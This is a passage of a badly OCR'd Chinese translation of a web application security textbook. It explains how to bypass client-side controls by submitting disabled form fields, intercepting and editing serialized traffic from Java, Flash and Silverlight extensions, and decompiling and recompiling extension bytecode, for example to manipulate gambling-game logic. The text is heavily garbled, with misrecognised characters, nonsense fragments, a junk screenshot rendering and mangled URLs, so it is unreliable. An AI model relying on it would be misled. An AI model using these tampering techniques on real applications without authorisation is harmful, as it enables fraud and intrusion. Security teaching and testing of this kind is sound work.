(1) 在 应 用 程序 的 每 一 个 表单 中 寻找 禁用 的 元 素 。 党 试 将 发 

ne 确定 其 是 否 
ny o 

(2) 通常 ， 如 果 提 交 元 素 被 标记 为 禁用 ， 其 按钮 即 以 灰色 显 
示 ， 表 示 相 关 操 作 无 效 。 这 时 应 该 尝试 提交 这 些 元 素 的 名 称 ， 确 定 
应 用 程序 是 否 在 执行 所 请 求 的 操作 前 执行 服务 絮 端 检查 。 

(3) 注意 ， 在 提交 表单 时 ， 浏 览 器 并 不 包含 禁用 的 表单 元 
A; 因此 ， 仅 仅 通过 浏览 应 用 程序 的 功能 以 及 监控 由 浏览 郁 发 布 的 
请 求 并 不 能 确定 其 中 是 否 含有 禁用 的 元 素 。 要 确定 禁用 的 元 素 ， 必 
须 监控 服务 器 的 啊 应 或 在 浏 咒 絮 中 查看 页 面 来 源 。 

(4) 还 可 以 使 用 Burp Proxy 中 的 HTML 修 改 功 能 目 动 重新 启用 
应 用 程序 中 的 任何 禁用 的 字段 。 


除 HTML 表 单 外 ， 另 一 种 收集 、 确 认 并 提 区 用 户 数据 的 主要 方法 
征 使 用 在 浏览 喜 扩 展 中 运行 的 客户 端 组 件 (如 Java 或 Flash) 。 最 初 用 
于 Web 应 用 程序 时 ， 浏 器 扩展 通常 用 于 执行 简单 而 基本 的 任务 。 如 
S, 已 经 有 越 来 越 多 的 公司 使 用 浏览 侨 扩 展 来 创建 功能 强大 的 客户 闪 
组 件 。 这 些 组 件 在 浏 唤 器 中 运行 ， 跨 越 多 个 客户 端 平 台 ， 提 供 相关 反 
局 ， 提 高 灵活 性 ， 并 与 介面 应 用 程序 协作 。 使 用 浏 唤 如 扩展 的 一 个 副 
作用 是 : 由 于 速度 和 用 户 体 验方 面 的 原因 ， 之 前 在 服务 器 上 执行 的 处 
理 任务 现在 将 在 客户 端 完成 。 对 某 些 应 用 程序 “如 网 上 交易 应 用 程 
序 ) 而 言 ， 速 度 至 关 重 要 ， 因 此 ， 许 多 关键 的 应 用 程序 任务 需要 在 客 
户 端 完 成 。 为 了 提高 速度 ， 在 开发 应 用 程序 时 可 能 需要 “有 意 ” 以 牺牲 
安全 为 代价 ， 这 可 能 是 因为 开发 者 误 以 为 交易 者 全 都 是 可 信用 户 ， 或 
者 浏览 占 扩 展会 目 行 防御 恶意 企图 。 但 是 ， 如 我 们 在 第 2 章 以 及 本 半 前 
面部 分 讨论 核心 安全 问题 时 所 述 ， 客 户 端 组 件 不 可 能 为 目 己 的 业务 逻 
辑 提 供 防御 。 

浏览 絮 扩 展 可 以 通过 输入 表单 、 或 者 在 某 些 情况 下 通过 与 客 尸 端 
操作 系统 的 文件 系统 或 注册 表 交 互 ， 以 各 种 不 同 的 方式 收集 数据 。 在 
将 收集 到 的 数据 提交 给 服务 器 之 前 ， 它 们 可 以 对 这 些 数据 执行 任何 复 
杂 的 确认 和 处 理 。 而 且 ， 由 于 它们 的 内 部 工作 机 制 与 HTML 表 单 和 
JavaScript 相 比 更 加 不 透明 ， 开 发 者 认为 它们 执行 的 确认 更 加 难以 身 
避 “。 为 此 ， 通 过 浏览 器 扩展 查找 Web 应 用 程序 中 存在 的 漏洞 往往 能 够 
获得 更 大 的 成 采 。 

赌博 组 件 是 应 用 客户 端 控件 的 典型 浏览 器 扩展 。 如 前 所 述 ， 客 户 
端 控件 并 不 可 靠 ， 因 此， 如 采 使 用 在 潜在 攻击 者 的 机 器 上 本 地 运行 的 
麟 听 器 扩 展 来 执行 在 线 赌博 应 用 程序 ， 这 种 做 法 将 非常 具有 诱惑 力 。 
如 琳 游 戏 的 任何 一 个 部 分 由 客户 端 而 非 服务 紫 控 制 ， 攻 击 者 就 可 以 非 
党 精确 地 对 游戏 进行 控制 ， 以 提高 获胜 机 率 、 改 变 规则 、 或 更 改 返 回 
给 服务 器 的 得 分 。 这 种 情况 将 导致 以 下 几 种 攻击 。 

口 可 能 会 使 用 客户 端 组 件 来 维护 游戏 状态 。 这 时 ， 攻 击 痢 束 可 以 
在 本 地 和 修改 游戏 状态 ， 从 而 在 游戏 中 获得 优势 。 

得 优势 。 


口 攻击 者 能 够 发 现 隐藏 的 功能 、 人 参数 或 资源， 一 旦 调用 这 些 功 
能 、 参 数 或 资源 ， 攻 击 者 将 可 以 非法 访问 服务 右 端 资源 。 

口 如 来 游戏 中 还 有 其 他 玩家 ， 客 户 问 组 件 可 能 会 接收 并 处 理 其 他 
玩家 的 信息 ， 攻 击 者 获知 这 些 信息 整 能 够 在 游戏 中 获得 优势 。 


5.3.1 常见 的 浏览 器 扩展 技术 


常见 的 浏览 絮 扩 展 搁 术 包 括 Java applet、Flash 和 Silverlight。 由 于 
这 些 技术 的 用 途 基本 相同 ， 因 此 ， 它 们 也 提供 类 似 的 安全 功能 : 

口 它 们 均 编 译 成 中 间 字 节 码 ; 

口 它 们 在 提供 沙 盒 执 行 环境 的 虚拟 机 中 运行 ; 

口 它们 可 能 会 使 用 远程 框架 ， 这 类 框架 采用 序列 化 来 传输 复杂 数 
据 结构 ， 或 通过 HTTP 传 送 对 象 。 

1. Java 

Java applet 在 Java 虚 拟 机 (JVM) 中 运行 ， 并 采用 由 Java 安 全 策略 
应 用 的 沙 盒 。 因 为 Java 在 Web 发 展 的 早期 束 已 存在 ， 并 且 其 核心 概念 
仍 基本 不 变 ， 因 此 ， 有 大 量 知 识 和 工具 可 用 于 对 Java applet 实 施 攻击 或 
进行 防御 《如 本 章 后 面部 分 所 述 ) 。 

2. Flash 

Flash 对 象 在 Flash 虚 拟 机 中 运行 。 和 Java applet 一 样 ，Flash 也 要 在 
主机 上 的 沙 盒 中 运行 。 此 前 ，Flash 主 要 用 于 传送 动画 内 容 。 但 随 着 较 
新 版 本 的 ActionScript 的 推出 ， 现 在 Flash 已 经 能 够 传送 成 熟 的 桌面 应 用 
程序 。Flash 最 近 的 主要 更 新 为 ActionScript 3 以 及 采用 动作 信息 格式 

(AMF) 序列 化 的 远程 功能 。 

3. Silverlight 

Silverlight 是 微软 开发 的 与 Flash 类 似 的 产品 。 同 样 ， 该 产品 主要 用 
于 启动 各 种 桌面 应 用 程序 ， 人 允许 Web 应 用 程序 在 浏览 器 内 的 沙 盒 环境 
中 提供 精简 的 .NET 体 验 。 从 技术 上 讲 ， 任 何 兼 容 .NET 的 语言 ， 从 C# 
到 Python， 都 可 用 于 开发 Silverlight， 但 C# 是 开发 Silverlight 最 常用 的 语 


A 


5.3.2 ”攻击 浏览 器 扩展 的 方法 


针对 使 用 浏 咒 器 扩展 组 件 的 应 用 程序 实施 攻击 时 ， 需 要 采用 以 下 
两 种 利用 的 扩 巧 。 


首先 ， 可 以 拦截 并 修改 浏览 器 扩展 组 件 提出 的 请 求 及 服务 器 的 响 
应 。 在 许多 情况 下 ， 这 是 对 浏览 器 扩展 组 件 进行 测试 的 最 简单 也 是 最 
快速 的 方法 ， 但 这 时 你 可 能 会 遇 到 各 种 限制 。 正 在 传输 的 数据 可 能 经 
过 模糊 处 理 或 加 密 ， 或 者 使 用 专门 针对 所 用 技术 的 方案 进行 了 序列 
化 。 仅 仅 查 看 组 件 生成 的 流量 ， 可 能 会 忽略 一 些 关键 的 功能 或 业务 逻 
辑 ， 而 这 些 功能 或 轨 辑 只 需 对 组 件 本 身 进行 分 析 就 可 以 发 现 。 另 外 ， 
在 正常 使 用 拦截 代理 服务 器 时 也 可 能 会 遇 到 障碍 ;但 是 ， 通 常情 况 
FF， 通过 仔细 配置 (如 本 章 后 面部 分 所 述 ) ， 完 全 可 以 克服 这 些 障 
得 。 

其 次 ， 可 以 直接 针对 组 件 实施 攻击 ， 并 尝试 反 编 译 它 的 字 节 码 ， 
以 查看 其 源 代码 ; 或 者 使 用 调试 器 与 组 件 进行 动态 交互 。 这 种 方法 的 
优点 在 于 ， 如 果 进 行 得 非常 彻底 的 话 ， 将 能 够 确定 组 件 支持 或 引用 的 
所 有 功能 。 还 能 修改 组 件 向 服务 器 提交 的 请 求 中 的 关键 数据 ， 而 无 论 
这 些 数据 采用 何 种 模糊 处 理 或 加 密 机 制 。 其 缺点 在 于 ， 这 种 方法 可 能 
相当 费时 ， 并 且 需 要 深入 了 解 浏览 器 扩展 组 件 所 使 用 的 技术 和 编程 语 


许多 时 候 ， 最 好 是 结合 使 用 上 述 两 种 技巧 。 下 面 我 们 详细 介绍 这 
种 技巧 。 


5.3.3 拦截 浏览 器 扩展 的 流量 


如 果 浏 览 器 已 配置 为 使 用 拦截 代理 服务 器 ， 并 且 应 用 程序 使 用 浏 
览 器 扩展 加 载 客 户 端 组 件 ， 这 时 ， 该 组 件 提 出 的 请 求 将 经 过 代理 服务 
右 。 在 某 些 情况 下 ， 这 时 融 可 以 开始 测试 相关 功能 ， 因 为 攻击 者 能 够 
以 利 规 方式 拦截 并 修改 组 件 提出 的 请 求 。 

在 需要 避 开 在 浏览 右 扩 展 中 实施 的 客户 端 输 入 确认 的 情况 下 ， 如 
果 组 件 以 透明 方式 向 服务 器 提供 经 过 确认 的 数据 ， 那 么 ， 如 5.2 节 所 
述 ， 可 以 使 用 拦截 代理 服务 器 修改 这 些 数据 。 例 如 ， 支 持 喘 份 验证 机 
制 的 浏览 器 扩展 可 能 会 收集 用 户 证 书 ， 并 对 这 些 证 书 进行 确认 ， 然 后 
在 请 求 中 以 明文 参数 的 形式 向 服务 器 提交 这 些 证 书 。 这 时 ， 攻 击 者 不 
需要 对 组 件 本 和 映 进 行 任何 分 析 或 攻击 ， 就 可 以 轻松 解除 这 种 确认 。 

在 其 他 情况 下 ， 测 试 浏览 硕 扩 展 组 件 可 能 会 遇 到 各 种 障碍 。 以 下 
几 节 将 讨论 这 些 问 题 。 

1. 处 理 序列 化 数据 

应 用 程序 可 能 会 首先 对 数据 或 对 象 进行 序列 化 处 理 ， 然 后 再 通过 
HTTP 请 求 传送 这 些 数据 或 对 象 。 当 然 ， 通 过 检查 原始 的 序列 化 数据 ， 


可 以 解 译 一 些 基于 字符 串 的 数据 ， 但 是 ， 通 党 而 言 ， 需 要 对 序列 化 数 
据 进 行 解压 缩 才 能 了 解 这 些 数据 。 如 琳 布 望 修改 这 些 数据 ， 以 破坏 应 
用 程序 的 处 理 过 程 ， 首 先 ， 和 需要 解压 缩 序列 化 内 容 ， 对 其 进行 必要 的 
编辑 ， 然 后 重新 对 其 进行 序列 化 处 理 。 几 乎 可 以 肯定 ， 直 接 编 辑 原 始 
的 序列 化 数据 将 破坏 其 格式 ， 并 在 应 用 程序 处 理 请 求 时 导致 解析 错 


误 。 

每 种 浏览 絮 扩 展 搁 术 都 具有 各 目 处 理 HHTTP 消 恩 中 数据 的 序列 化 
方案 。 因 此 ， 通 常 渗透 测试 员 可 以 根据 所 采用 的 客户 端 组 件 推 新 出 相 
关 数 据 的 序列 化 格式 ， 但是， 任何 时 候 ， 仔 细 检 查 相关 HTTP 消 息 才能 
确认 序列 化 格式 。 

è Java 序 列 化 

Java 语 言 本 号 文 持 对 象 序 列 化 ， 而 且 ，Java applet 可 能 会 以 这 种 方 
式 在 客户 端 与 服务 妖 应 用 程序 组 件 之 间 传 送 序 列 化 数据 结构 。 通 常 ， 
ee ee 息 很 容易 辨别 ， 因 为 它们 使 用 以 下 Content- 
Typa EA: 


Content-Type: application/x-java-serialized-object 


使 用 代理 服务 器 拦截 原始 的 序列 化 数据 后 ， 就 可 以 通过 Java 对 这 
些 数据 进行 去 序列 化 处 理 ， 以 查看 其 中 包含 的 原 语 数据 项 。 

Dser 是 Burp Suite 中 的 一 个 有 用 插件 ， 该 插件 提供 一 个 框架 ， 可 用 
于 查看 和 处 理 Burp 拦 截 的 序列 化 Java 对 象 。 该 工具 将 拦截 到 的 对 象 中 
的 原 语 数据 转换 为 XML 格式 ， 以 便于 进行 编辑 。 编 辑 相 关 数 据 后 ， 
Dser 将 重新 对 对 象 进 行 序 列 化 ， 并 对 HTTP 请 求 进行 相应 的 更 新 。 

可 以 在 以 下 URL 下 载 Dser 并 详细 了 解 它 的 运行 机 制 ; 


http: biog labs g/2019/09/re-visiting-java-de-serialization-it.htmi 


e anit 

Flash 使 用 上 自己 的 可 用 于 在 服务 器 和 客户 端 组 件 之 间 传 输 复杂 数据 
结构 的 序列 化 格式 。 通 常 ， 可 以 通过 以 下 Content-Type 消 妃 头 辨别 动作 
信息 格式 (AMF) : 


Content-Type: application/x-amf 


Burp 本 身 文 持 AMF 格 式 。 确 定 包 含 序 列 化 AMF 数 据 的 HTTP 请 求 
或 响应 后 ， 它 会 解压 缩 并 以 树 状 形式 显示 相关 内 容 ， 以 便于 查看 和 编 
辑 ， 如 图 5-5 所 示 。 在 修改 结构 中 的 相关 原 语 数据 项 后 ，Burp 将 重新 对 


消 居 进行 序列 化 ， 然 后 不可 以 将 该 消 居 转 发 给 服务 絮 或 客户 端 ， 由 尼 
们 进行 处 理 。 
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burp inwuder repeater window help 
larget procy spdat scanner | niruder repeater | sequencer Jecnder parer bons lert 
1 
9 host www myapn.com 
por 443 vj tsa SSL 
request 
raw ara cade amt 
type alu 
E AWE w = 
P- body 0 
a target sting LognHandler 
a ras sting 1 
a response method sting LognHancdler 
ya tay 
a U sting user 
a [i sting password ] 
[23 null 
TB boolean 3 
1 numb 0 
4 5 number 1.48174081391711 ME16 
1 加 number 39.0 
1 77) numb: 2.0 
le null 
> [] angay X 
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图 5-5 Burp Suite 文 持 AMF 格 式 并 允许 查看 和 编辑 去 序列 化 数据 


è Silverlight 序列 化 
Silverlight 应 用 程序 能 够 利用 .NET 平 台 内 置 的 Windows 通 信和 基础 
(WCF) 远程 框架 。 使 用 WCF 的 Silverlight 客 户 端 组 件 通 常 采用 微软 
的 用 于 SOAP 的 .NET 二 进 制 格式 (.NET Binary Format for SOAP, 
NBFS) 。 可 以 通过 以 下 Content-Type 消 息 头 辨别 该 格式 : 


Content-Type: application/soap+msbinl 


Burp Proxy 中 的 一 个 插件 能 够 自动 对 NBFS 编 辑 的 数据 进行 去 序列 
化 ， 然 后 在 Burp 的 拦截 窗口 中 显示 这 些 数据 。 在 查看 或 编辑 已 解码 的 
数据 后 ， 该 插件 会 对 数据 重新 进行 编辑 ， 然 后 将 数据 转发 给 服务 器 或 
客户 端 ， 由 它们 进行 处 理 。 

用 于 Burp 的 WCF 二 进 制 SOAP 插 件 由 Brian Holyfield 开 发 ， 可 以 从 
以 下 URL 下 载 该 插件 : 


www.gdssecurity.com/1/b/2009/11/19/wef-binary-soap-plug-in-for-burp/ 


2. ERD Bt SN i 2) Re 

如 果 浏 览 器 已 设置 为 使 用 拦截 代理 服务 器 ， 代 理 服 务 器 可 能 并 不 
会 拦截 ， 或 无 法 拦截 浏 虎 缉 扩 展 组 件 提 出 的 请 求 。 之 所 以 出 现 这 种 情 
况 ， 可 能 是 由 于 组 件 的 HTTP 代 理 或 SSL 出 现 问题 ， 或 者 二 者 同时 出 现 
问题 。 一 般 情况 下 ， 通 过 仔细 配置 代理 服务 絮 可 解决 这 个 问题 。 

第 一 个 问题 是 ， 客 户 问 组 件 可 能 并 不 执行 在 浏 贤 器 或 计算 机 的 设 
置 中 指定 的 代理 配置 。 这 是 因为 组 件 可 能 会 在 浏 贤 器 本 身 或 扩展 框架 
提供 的 API 以 外 发 出 它们 自己 的 HTTP 请 求 。 出 现 这 种 情况 仍然 可 以 拦 
截 组 件 的 请 求 ， 但 需要 修改 计算 机 的 hosts 文 件 以 实现 拦截 日 的 ， 同 时 
将 代理 服务 器 配置 为 支持 匿名 代理 ， 并 自动 重 定向 到 正确 的 目标 主 
机 。 更 多 详细 信息 ， 请 参阅 第 20 章 。 

另 一 个 问题 在 于 ， 客 户 端 组 件 可 能 不 接受 拦截 代理 服务 器 提供 的 
SSEL 证 书 。 即 使 代理 服务 妖 使 用 的 是 一 般 目 签名 证 书 ， 并 且 浏 虎 恬 已 
配置 为 授 受 这 类 证 书 ， 但 浏 贤 器 扩展 组 件 仍 有 可 能 拒绝 此 类 证 书 。 这 
可 能 是 因为 浏览 絮 扩 展 组 件 不 接受 浏 贤 器 在 暂时 可 信 的 证 书 方面 的 配 
置 ， 或 者 因为 组 件 本 喘 以 编程 方式 要 求 拒绝 接受 不 可 信 的 证 书 。 无 论 
是 哪 一 种 原因 ， 都 可 以 将 代理 服务 器 配置 为 使 用 一 个 主 CA 证 书 (用 于 
为 访问 的 每 个 站 点 的 每 台 主 机 签署 有 效 的 证 书 ) ， 并 在 计算 机 的 可 信 
证 书库 中 安装 该 CA 证 书 ， 从 而 解决 这 个 问题 。 更 多 详细 信息 ， 请 参阅 
第 20 章 。 

有 些 时 候 ， 客 户 端 组 件 还 使 用 除 HTTP 以 外 的 协议 进行 通信 ， 而 拦 
截 代理 服务 器 却 无 法 处 理 这 些 协议 。 在 这 些 情况 下 ， 仍 然 可 以 通过 使 
用 网 络 嗅 探 辟 或 功能 挂钩 工具 查看 并 修改 相关 流量 。Echo Mirage 就 是 
一 个 这 样 的 工具 ， 它 能 够 注入 进程 并 拦截 套 接 字 API 调 用 ， 以 便 查 看 
并 修改 数据 ， 然 后 通过 网 络 传送 修改 后 的 数据 。 可 以 从 以 下 URL 下 载 
Echo Mirage: 


www. bindshell.net/tools/echomirage 


渗透 测试 步骤 


(1) 确保 代理 服务 器 能 够 正确 拦截 浏览 器 扩展 送出 的 所 有 流 
量 。 如 有 必要 ， 使 用 嗅 探 器 确定 任何 未 正确 拦截 的 流量 。 

(2) 如 采 客 户 端 组 件 使 用 标准 的 序列 化 方案 ， 确 你 拥有 解压 
并 修改 序列 化 数据 所 需 的 工具 。 如 果 浏 览 如 组件 使 用 专用 编码 或 加 
密 机 制 ， 则 需要 解 译 或 调试 该 组 件 ， 对 其 进行 全 面 测试 。 

(3) 检查 服务 器 返回 的 触发 关键 客户 端 逻 辑 的 啊 应 。 通 党， 
及 时 拦截 并 修改 服务 万 啊 应 能 够 “解锁 ?客户 端 GUI， 从 而 轻松 发 现 
并 执行 复杂 或 多 步骤 特权 操作 。 

(4) 如 有 果 应 用 程序 执行 不 得 由 客户 端 组 件 执行 的 任何 关键 逻 
辑 或 事件 (如 在 赌博 应 用 程序 中 发 牌 或 摇 骨 子 ) ， 这 时 ， 可 以 寻找 
执行 关键 逻辑 和 与 服务 絮 通 信之 间 的 任何 联系 。 如 果 客 户 闻 在 确定 
事件 的 结果 时 不 需要 与 服务 右 进 行 通信 ， 这 说 明 应 用 程序 肯定 存在 
漏洞 。 


5.3.4_ 反 编译 浏览 器 扩展 


运 今 为 止 ， 在 对 浏 咒 絮 扩展 组 件 实施 攻击 时 ， 最 彻底 的 方法 ， 是 
肥 编 译 对 象 、 对 源 代码 进行 全 面 分 析 、 修 改 源 代码 (如 有 必要 ) 以 改 
变 对 象 的 行为 ， 然 后 重新 编译 源 代码 。 如 前 所 述 ， 浏 贤 器 扩展 个 编译 
成 字 节 码 。 字 节 码 是 一 种 由 相关 解释 器 (如 Java 虚 拟 机 或 Flash 播 放 
an) 执行 的 、 不 依赖 于 特定 平台 的 高 级 二 进 制 表示 形式 ， 每 种 浏览 器 
扩展 技术 都 使 用 它们 目 己 的 字 广 码 格 式 。 因 此 ， 浏 览 占 扩展 能 够 在 解 
释 器 本 里 可 运行 的 任何 平台 上 运行 。 

字 市 码 表示 形式 的 高 级 本 质 意味 着 ， 从 理论 上 讲 ， 最 终 可 以 将 子 
节 码 反 编 译 成 类 似 于 最 初 的 源 代码 的 内 容 。 但 是 ， 字 市 码 可 能 采用 了 
eee 
译 代 码 。 

尽管 字 世 人 码 采 取 了 上 述 防 御 机 制 ， 但 是 ， 在 理解 和 攻击 浏览 郁 扩 
展 组 件 时 ， 反 编译 字 世 码 仍然 是 首选 方法 。 通 过 反 编 译 字 节 码 ， 可 以 


查看 客户 端 应 用 程序 的 业务 逻辑 、 访 问 它 的 全 部 功能 ， 以 及 有 针对 性 
地 修改 其 行为 。 
1. 下 载 字 节 码 

第 一 步 是 下 载 要 处 理 的 可 执行 字 世 码 。 一 般 情况 下 ， 字 贡 码 会 从 
HTML 源 代码 (运行 浏览 器 扩展 的 应 用 程序 页 面 ) 中 指定 的 URL 加 载 
到 单独 的 文件 中 。Java applet 通 常 使 用 <applet> 标 签 加 载 ， 其 他 组 件 则 
使 用 《object〉》 标 签 加 载 。 例 如 : 


<applet code="CheckQuantity.class" codebase="/scripts" 


id="CheckQuantityApplet"> 


</fapplet> 


某 些 情况 下 ， 加 载 字 广 码 的 URL 可 能 并 不 是 非常 明显 ， 因 为 组 件 
可 能 使 用 不 同 浏览 器 扩展 框架 提供 的 各 种 包装 脚本 (wrapper script) 
进行 加 载 。 确 定 字 蔬 码 的 URL 的 另 一 种 方法 ， 是 在 浏览 右 加 载 浏览 众 
扩展 后 ， 在 代理 服务 器 历史 记录 中 查找 该 URL。 如果 采用 这 种 方法 ， 
需要 了 解 以 下 两 个 可 能 的 问题 。 

口 一 些 代理 服务 器 工具 对 代理 服务 器 历史 记录 应 用 过 滤器 ， 以 隐 
藏 渗透 测试 员 通 肖 并 不 感 兴趣 的 视图 项 目 ， 如 图 像 和 样式 表 文件 。 如 
果 找 不 到 与 浏览 器 扩展 字 市 码 有 关 的 请 求 ， 那 么 应 对 代理 服务 器 历史 
记录 显示 过 滤 絮 进行 修改 ， 以 显示 所 有 项 目 。 

口 通常 ， 相 比 于 网 像 等 其 他 静态 资源 ， 浏 览 郁 会 在 缓存 中 更 多 地 
存储 已 下 载 的 扩展 组 件 字 市 码 。 如 果 浏 宽 紫 已 加 载 某 个 组 件 的 子 市 
码 ， 那 么 ， 即 使 完全 刷新 使 用 该 组 件 的 页 面 ， 浏 览 絮 也 不 会 再 次 请 求 


该 组 件 。 在 这 种 情况 下 ， 可 能 需要 完全 清除 浏览 胡 的 缓存， 关闭 每 一 
个 浏览 右 实 例 ， 然 后 局 动 新 的 浏览 占 会 话 ， 才 能 强制 浏览 右 再 次 请 求 
FHH ° 

确定 浏 贤 器 扩展 字 万 码 的 URL 后 ， 只 需 将 该 URL 烙 贴 到 浏览 器 的 
地 址 栏 中 ， 然 后 ， 浏 贤 右 会 提示 你 将 字 节 码 文 件 保存 到 本 地 文件 系统 
中 0 


V ”提示 如 果 已 在 Burp Proxy 历 史记 录 中 确定 了 与 字 节 码 有 关 
的 请 求 ， 并 且 服 务 器 的 响应 中 包含 完整 的 字 节 码 (而 没有 3 引用 以 前 
缓存 的 副本 ) ， 这 时 ， 可 以 将 字 节 码 直 接 保 存 到 Burp 内 的 文件 中 。 


最 可 靠 的 方法 是 选择 响应 查看 器 中 的 “标题 ”(Herders) 选项 卡 ， 厂 


键 单 击 包 含 响 应 主体 的 下 方 窗 格 ， 然 后 从 上 下 文 菜 单 中 选择 “复制 
到 文件 ”(Copy to File) 。 


2. 反 编 译 字 节 码 

字 慷 码 通 常 以 独立 文件 包 的 形式 发 布 ， 可 能 需要 进行 解压 缩 才能 
获得 单个 字 届 码 文件 ， 然 后 再 将 其 反 编译 成 源 代码 。 

正常 情况 下 ，Java applet 打 包 成 .jar (Java 档 案 ) 文件 ，Silverlight 
对 和 象 则 打包 成 .xap 文 件 。 这 两 种 文件 均 使 用 zip 档 案 格 式 ， 因 此 ， 只 需 
用 .zip 扩 展 名 重 命 名 这 些 文件 ， 然 后 使 用 任何 .zip 读 取 絮 就 可 以 将 它们 
解压 缩 成 单个 的 文件 。Java 字 广 码 包含 在 .class 文 件 中 ，Silverlight 字 方 
码 包 含 在 .dll 文 件 中 。 解 压缩 相关 文件 包 后 ， 需 要 反 编 译 这 些 文件 才能 
获得 源 代码 。 

Flash 对 象 打包 成 ,swf 文件， 在 使 用 反 编 译 器 之前， 不 需要 对 这 类 
文件 进行 解压 缩 处 理 。 

实际 的 反 编 译 字 万 但 需要 使 用 一 些 特定 的 工具 ， 这 些 工 具 因 所 采 
用 的 浏 硕 圳 扩展 技术 的 类 型 而 异 ， 我 们 将 在 以 下 几 和 介绍 这 些 工 具 。 

@ Javal E 

Java 字 节 码 可 以 使 用 称 为 Jad (Java 反 编译 器 ) 的 工具 反 编 译 成 
Java 源 代码 ， 该 工具 的 下 载 地 址 如 下 : 


www.varaneckas.com/jad 


e Flash lLt 
Flash F 73 05 By LA Be Basi ActionScript ARAS ° APE I A 
FE, ERE TA AMARA AAR, NESE ie ne 
成 源 代 码 。 
要 反 编 译 和 反 汇 编 Flash， 可 以 使 用 以 下 工具 : 
口 Flasm——www.nowrap.de/flasm; 
g Flare www.nowrap.de/flare; 
口 SWFScan 一 一 www.hp.comy/go/swfscan (此 工具 针对 Actionscript 
2 和 Actionscript 3) ° 
è Silverlight 工具 
Silverlight 字 下 码 可 以 使 用 一 种 称 为 .NET Reflector 的 工具 反 编 译 成 
源 代码 ， 该 工具 的 下 载 地 址 为 : 


www.red-gate.com/products/dotnet-development/reflector/ 
3. 分 析 源 代码 

获得 组 件 的 源 代 码 或 类 似 代码 后 ， 就 可 以 采取 各 种 方法 对 其 实施 
攻击 。 通 常 ， 第 一 步 是 查看 源 代 码 ， 以 了 解 组 件 的 工作 机 制 及 其 包含 
或 引用 的 功能 。 以 下 是 需要 寻找 的 一 些 项 目 : 
口 在 客户 端 发 生 的 输入 确认 或 其 他 安全 相关 逻辑 和 事件 ; 
0 
密 程 序 ; 
口 在 用 户 界 面 中 不 可 见 ， 但 可 以 通过 修改 组 件 进行 解锁 的 “隐藏 
的 ”客户 端 功能 ; 
口 对 以 前 未 通过 解析 应 用 程序 确定 的 服务 器 端 功能 的 引用 。 
通常 ， 查 看 产 代 码 可 以 揭示 组 件 中 的 一 些 有 趣 的 功能 。 渗 透 测试 
员 硕 望 修改 或 操纵 这 些 功能 ， 以 确定 次 在 的 安全 漏洞 。 和 希望 执 行 的 操 
作 包 括 : 删除 客户 端 输入 确认 、 回 服务 器 提交 未 标准 化 的 数据 、 操 纵 
客户 病状 态 或 事件 ， 或 者 直接 调用 组 件 中 的 功能 。 

如 以 下 几 节 所 述 ， 可 通过 各 种 方式 修改 组 件 的 行为 。 

e 在 浏览 絮 中 重新 编译 并 执行 

要 改变 组 件 的 行为 ， 可 以 对 反 编译 得 到 的 源 代码 进行 修改 ， 重 新 
将 其 编译 成 字 市 码 ， 然 后 在 浏览 右 中 执行 修改 后 的 组 件 。 需 要 操纵 天 
键 的 客户 问 事 件 ， 如 在 赌博 应 用 程序 中 揪 骨 子 时 ， 通 常 首 选 这 种 方 


法 
要 重新 编译 源 代 码 ， 需 要 使 用 与 采用 的 技术 有 关 的 开发 者 工具 。 
口 对 于 Java， 可 以 使 用 JDK 中 的 javac 程 序 重新 编译 修改 后 的 源 代 


fH o 
口 对 于 Flash， 可 以 使 用 flasm 重 新 汇编 修改 后 的 字 节 人 码 ， 或 使 用 
Adobe 的 某 个 Flash 开 发 套件 重新 编译 修改 后 的 ActionScript 源 代码 。 
口 对 于 Silverlight， 可 以 使 用 Visual Studio 重 新 编译 修改 后 的 源 代 
码 。 


将 源 代 码 重 新 编译 成 一 个 或 多 个 字 下 码 文件 后 ， 如 果 采 用 的 技术 
需要 ， 可 能 需要 重新 打包 可 分 配 的 文件 。 对 于 Java 和 Silverlight， 需 要 
用 修改 后 的 字 市 码 文 件 奉 换 已 解压 的 档案 中 的 文件 ， 使 用 zip 实 用 程度 
重新 压缩 这 些 文 件 ， 然 后 根据 需要 将 文件 扩展 名 更 改 为 .jar 或 .xap 。 

最 后 ， 需 要 将 修改 后 的 组 件 加 载 到 浏览 碍 中 ， 使 所 做 的 更 改 在 测 
试 的 应 用 程序 中 生效 。 可 以 通过 多 种 方式 达到 这 一 目的 。 


口 如 采 可 以 在 浏 贤 避 的 磁 僵 缓存 中 找到 包含 原始 可 执行 文件 的 物 
理 文件 ， 可 以 用 修改 后 的 版 本 替换 该 文件 ， 然 后 重 狐 启动 浏 斋 器 。 但 
是 ， 如 果 浏 贤 颖 并 不 对 每 个 绥 存 的 资源 使 用 不 同 的 文件 ， 或 者 浏 贤 如 
只 是 将 扩展 组 件 缓存 在 内 存 中 ， 这 种 方法 可 能 无 法 生效 © 

口 可 以 使 用 拦截 代理 服务 器 修改 加 载 组 件 页 面 的 源 代 码 ， 并 指定 
另 一 个 指向 本 地 文件 系统 或 受 探 的 Web 服 务 顺 的 URL。 正 常情 况 下 ， 
这 种 方法 很 难 奏 效 ， 因 为 更 改 加 载 组 件 的 域 可 能 会 违反 浏 贤 器 的 同 源 
gt 而 且 可 能 需要 重新 配置 浏览 器 ， 或 采用 其 他 方法 弱化 同 源 策 
WE 。 

口 可 以 使 浏览 器 从 原始 服务 器 重新 加 载 组 件 《如 5.3.4 节 所 述 ) ， 
使 用 代理 服务 器 拦 截 包 含 可 执行 文件 的 啊 应 ， 并 用 修改 后 的 版 本 替换 
消息 主体 。 在 Burp Proxy 中 ， 可 以 使 用 “从 文件 中 粘贴 ”\Paste from 
File) 上 下 文 菜 单项 达到 这 个 目的 。 通 常 ， 这 是 最 简单 的 方法 ， 也 是 
最 不 容易 过 到 上 述 问 题 的 方法 。 

@ 在 浏览 右 以 外 重新 编译 并 执行 

有 些 时 候 ， 并 不 需要 在 执行 组 件 的 过 程 中 修改 组 件 的 行为 。 例 
如 ， 一 些 浏览 絮 扩 展 组 件 会 确认 用 户 提交 的 输入 ， 对 这 些 输入 进行 模 
糊 处 理 或 加 密 ， 然 后 将 其 传送 至 服务 右 。 在 这 种 情况 下 ， 可 以 对 组 件 
进行 修改 ， 使 其 对 任何 未 经 确认 的 输入 执行 必要 的 模糊 处 理 或 加 密 ， 
并 在 本 地 输出 结果 。 人 然后， 可 以 使 用 代理 服务 器 在 原始 组 件 提 交 经 过 
[ 认 的 输入 时 拦截 相关 请 求 ， 并 用 修改 后 的 组 件 输 出 的 值 蔡 换 这 些 请 


